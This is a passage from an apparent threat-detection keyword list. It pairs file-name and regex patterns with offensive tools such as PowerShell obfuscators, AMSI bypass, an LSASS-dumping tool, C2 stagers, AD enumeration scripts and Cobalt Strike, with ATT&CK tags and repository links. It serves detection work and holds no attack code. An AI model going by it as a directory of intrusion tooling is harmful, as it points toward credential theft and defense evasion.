"*Out-ObfuscatedStringConstantExpressionAst *",".{0,1000}Out\-ObfuscatedStringConstantExpressionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54196"
"*Out-ObfuscatedStringConstantExpressionAst *",".{0,1000}Out\-ObfuscatedStringConstantExpressionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54197"
"*Out-ObfuscatedSubExpressionAst *",".{0,1000}Out\-ObfuscatedSubExpressionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54198"
"*Out-ObfuscatedSubExpressionAst *",".{0,1000}Out\-ObfuscatedSubExpressionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54199"
"*Out-ObfuscatedSwitchStatementAst *",".{0,1000}Out\-ObfuscatedSwitchStatementAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54200"
"*Out-ObfuscatedSwitchStatementAst *",".{0,1000}Out\-ObfuscatedSwitchStatementAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54201"
"*Out-ObfuscatedThrowStatementAst *",".{0,1000}Out\-ObfuscatedThrowStatementAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54202"
"*Out-ObfuscatedThrowStatementAst *",".{0,1000}Out\-ObfuscatedThrowStatementAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54203"
"*Out-ObfuscatedTokenCommand*",".{0,1000}Out\-ObfuscatedTokenCommand.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54204"
"*Out-ObfuscatedTokenCommand*",".{0,1000}Out\-ObfuscatedTokenCommand.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54205"
"*Out-ObfuscatedTokenCommand.ps1*",".{0,1000}Out\-ObfuscatedTokenCommand\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54206"
"*Out-ObfuscatedTokenCommand.ps1*",".{0,1000}Out\-ObfuscatedTokenCommand\.ps1.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","54207"
"*Out-ObfuscatedTrapStatementAst *",".{0,1000}Out\-ObfuscatedTrapStatementAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54208"
"*Out-ObfuscatedTrapStatementAst *",".{0,1000}Out\-ObfuscatedTrapStatementAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54209"
"*Out-ObfuscatedTryStatementAst *",".{0,1000}Out\-ObfuscatedTryStatementAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54210"
"*Out-ObfuscatedTryStatementAst *",".{0,1000}Out\-ObfuscatedTryStatementAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54211"
"*Out-ObfuscatedTypeConstraintAst *",".{0,1000}Out\-ObfuscatedTypeConstraintAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54212"
"*Out-ObfuscatedTypeConstraintAst *",".{0,1000}Out\-ObfuscatedTypeConstraintAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54213"
"*Out-ObfuscatedTypeDefinitionAst *",".{0,1000}Out\-ObfuscatedTypeDefinitionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54214"
"*Out-ObfuscatedTypeDefinitionAst *",".{0,1000}Out\-ObfuscatedTypeDefinitionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54215"
"*Out-ObfuscatedTypeExpressionAst *",".{0,1000}Out\-ObfuscatedTypeExpressionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54216"
"*Out-ObfuscatedTypeExpressionAst *",".{0,1000}Out\-ObfuscatedTypeExpressionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54217"
"*Out-ObfuscatedUnaryExpressionAst *",".{0,1000}Out\-ObfuscatedUnaryExpressionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54218"
"*Out-ObfuscatedUnaryExpressionAst *",".{0,1000}Out\-ObfuscatedUnaryExpressionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54219"
"*Out-ObfuscatedUsingExpressionAst *",".{0,1000}Out\-ObfuscatedUsingExpressionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54220"
"*Out-ObfuscatedUsingExpressionAst *",".{0,1000}Out\-ObfuscatedUsingExpressionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54221"
"*Out-ObfuscatedUsingStatementAst *",".{0,1000}Out\-ObfuscatedUsingStatementAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54222"
"*Out-ObfuscatedUsingStatementAst *",".{0,1000}Out\-ObfuscatedUsingStatementAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54223"
"*Out-ObfuscatedVariableExpressionAst *",".{0,1000}Out\-ObfuscatedVariableExpressionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54224"
"*Out-ObfuscatedVariableExpressionAst *",".{0,1000}Out\-ObfuscatedVariableExpressionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54225"
"*Out-ObfuscatedWhileStatementAst *",".{0,1000}Out\-ObfuscatedWhileStatementAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54226"
"*Out-ObfuscatedWhileStatementAst *",".{0,1000}Out\-ObfuscatedWhileStatementAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54227"
"*Out-ParenthesizedString *",".{0,1000}Out\-ParenthesizedString\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54228"
"*Out-PasteBin.ps1*",".{0,1000}Out\-PasteBin\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","54229"
"*Output malware sample selected: *",".{0,1000}Output\smalware\ssample\sselected\:\s.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","0","N/A","N/A","10","9","840","147","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z","54230"
"*output*kitten.exe*",".{0,1000}output.{0,1000}kitten\.exe.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","54232"
"*output*-lsass.dmp*",".{0,1000}output.{0,1000}\-lsass\.dmp.{0,1000}","offensive_tool_keyword","physmem2profit","Physmem2profit can be used to create a minidump of a target hosts' LSASS process by analysing physical memory remotely","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/WithSecureLabs/physmem2profit","1","0","N/A","N/A","10","5","415","74","2022-07-27T03:33:59Z","2020-02-14T08:34:27Z","54233"
"*Output.aes.zip*",".{0,1000}Output\.aes\.zip.{0,1000}","offensive_tool_keyword","EncryptedZIP","Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. This assembly also clears the key out of memory using RtlZeroMemory","T1564.001 - T1027 - T1214.001","TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","54234"
"*output/AccountsWithSPN.txt*",".{0,1000}output\/AccountsWithSPN\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54235"
"*output/AdminAccessComputers.txt*",".{0,1000}output\/AdminAccessComputers\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54236"
"*output/AllDomainControllers.txt*",".{0,1000}output\/AllDomainControllers\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54237"
"*output/AllDomainGroups.txt*",".{0,1000}output\/AllDomainGroups\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54238"
"*output/AllDomainHosts.txt*",".{0,1000}output\/AllDomainHosts\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54239"
"*output/AllDomainUserAccounts.txt*",".{0,1000}output\/AllDomainUserAccounts\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54240"
"*output/AllDomainUsers.txt*",".{0,1000}output\/AllDomainUsers\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54241"
"*output/AllServers.txt*",".{0,1000}output\/AllServers\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54242"
"*output/AllServers2k12.txt*",".{0,1000}output\/AllServers2k12\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54243"
"*output/AllServers2k16.txt*",".{0,1000}output\/AllServers2k16\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54244"
"*output/AllServers2k19.txt*",".{0,1000}output\/AllServers2k19\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54245"
"*output/AllServers2k22.txt*",".{0,1000}output\/AllServers2k22\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54246"
"*output/AllServers2k8.txt*",".{0,1000}output\/AllServers2k8\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54247"
"*output/AllTrusts.txt*",".{0,1000}output\/AllTrusts\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54248"
"*output/CompletedDescriptionField.txt*",".{0,1000}output\/CompletedDescriptionField\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54249"
"*output/DescriptionContainsPass.txt*",".{0,1000}output\/DescriptionContainsPass\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54250"
"*output/DNETAccountsByDescription.txt*",".{0,1000}output\/DNETAccountsByDescription\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54251"
"*output/DomainAdmins.txt*",".{0,1000}output\/DomainAdmins\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54252"
"*output/DomainGroupsLocalAdmin.txt*",".{0,1000}output\/DomainGroupsLocalAdmin\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54253"
"*output/DomainUserAccountsWithCompletedADDescription.txt*",".{0,1000}output\/DomainUserAccountsWithCompletedADDescription\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54254"
"*output/ExchangeServers.txt*",".{0,1000}output\/ExchangeServers\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54255"
"*output/html/data/beacons.json*",".{0,1000}output\/html\/data\/beacons\.json.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","54256"
"*output/NeverLoggedInAccounts.txt*",".{0,1000}output\/NeverLoggedInAccounts\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54257"
